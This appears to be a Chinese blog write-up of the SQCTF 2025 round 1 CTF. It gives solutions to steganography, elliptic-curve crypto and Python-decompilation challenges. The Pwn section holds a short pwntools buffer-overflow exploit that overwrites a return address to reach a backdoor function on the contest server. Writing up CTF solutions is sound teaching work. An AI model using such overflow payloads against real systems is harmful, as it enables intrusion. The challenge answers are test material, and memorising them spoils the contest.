SQCTF 2025 R1 [2025/04/09]

Misc

宝宝你是一只白色大猫猫

silenteye提出图片,修png得到二维码,扫描得到flag

![image-20250407221520674](../../../../img/archives/SQCTF 2025 R1/image-20250407221520674.png)

ez_music1

Aud打开频谱图直接看到

![image-20250407221443225](../../../../img/archives/SQCTF 2025 R1/image-20250407221443225.png)

love.host

jpg后面藏了个zip,提出来直接就是flag

Welcome_Sign_in

关注公众号

SQCTF{It_is_really_signin}

Crypto

![image-20250409075214314](../../../../img/archives/SQCTF 2025 R1/image-20250409075214314.png)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from sage.all import *

# 定义椭圆曲线参数
p = 7654319
a = 1234577
b = 3213242

# 创建有限域
F = GF(p)

# 创建椭圆曲线
E = EllipticCurve(F, [a, b])

# 基点
G = E(5234568, 2287747)

# 公钥
pubkey = E(2366653, 1424308)

# 密文
c1 = E(5081741, 6744615)
c2 = E(610619, 6218)

# 计算曲线的阶
order = G.order()
print(f"曲线阶: {order}")

# 使用Baby-step Giant-step算法解决ECDLP问题,找到私钥
def discrete_log(G, pubkey, order):
    # 在CTF中,通常曲线阶较小或有特殊结构
    try:
        # 使用SageMath内置的离散对数求解器
        secret_key = G.discrete_log(pubkey)
        return secret_key
    except:
        # 如果内置方法失败,可以尝试Pohlig-Hellman
        return discrete_log_pohlig_hellman(G, pubkey, order)

# 尝试求解私钥
try:
    secret_key = discrete_log(G, pubkey, order)
    print(f"找到私钥: {secret_key}")
    
    # 解密
    m = c2 - secret_key * c1
    print(f"解密结果: {m}")
    
    # 计算x + y
    x, y = m.xy()
    result = x + y
    print(f"x + y = {result}")
except Exception as e:
    print(f"解密失败: {e}")
    
    # 备选方案:尝试使用Pollard's rho算法
    print("尝试使用Pollard's rho算法...")
    # pollard_rho实现...

![image-20250409074942768](../../../../img/archives/SQCTF 2025 R1/image-20250409074942768.png)

Reverse

https://pylingual.io

github.com

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: eee.py
# Bytecode version: 3.10.0rc2 (3439)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)

def verification():
    part1 = 'flag{'
    part2 = 'xxxxxxxxxxxxxxxxxxxxxxx'
    part3 = '}'
    tmp = ''
    part2_1 = part2[:7]
    part2_2 = part2[7:20]
    part2_3 = part2[20:]
    for i in range(len(part2_1)):
        tmp += chr(ord(part2_1[i]) + 5)
    for i in range(len(part2_2)):
        tmp += chr(ord(part2_2[i]) + 0)
    for i in range(len(part2_3)):
        tmp += chr(ord(part2_3[i]) - 7)
    ciphertext = 'itd~tzw_know_sanmenxbZ8'
    true_flag = part1 + part2 + part3

![image-20250409075124154](../../../../img/archives/SQCTF 2025 R1/image-20250409075124154.png)

1
2
3
4
5
6
7
8
9
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 33.py
# Bytecode version: 3.9.0beta5 (3425)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)

import base64
encoded_flag = 'NWVkMmJlNDUtMmU4My00OGQyLWI2MzEtYzA4OGU1MWVlOTY0'
flag = base64.b64decode(encoded_flag).decode('utf-8')
print(flag)

Web

![image-20250409084001397](../../../../img/archives/SQCTF 2025 R1/image-20250409084001397.png)

Pwn

backdoor一把梭

![image-20250409074826814](../../../../img/archives/SQCTF 2025 R1/image-20250409074826814.png)

1
2
3
4
5
6
7
from pwn import *

p=remote("challenge.qsnctf.com",30635)
# p.interactive()
payload = b"a"*0x50+b"a"*0x8 +p64(0x401232)
p.sendline(payload)
p.interactive()
#CTF
SQCTF 2025 R1 [2025/04/09]
https://more678.github.io/2025/06/30/SQCTF 2025 R1/
作者
tenstrings
发布于
2025年6月30日
许可协议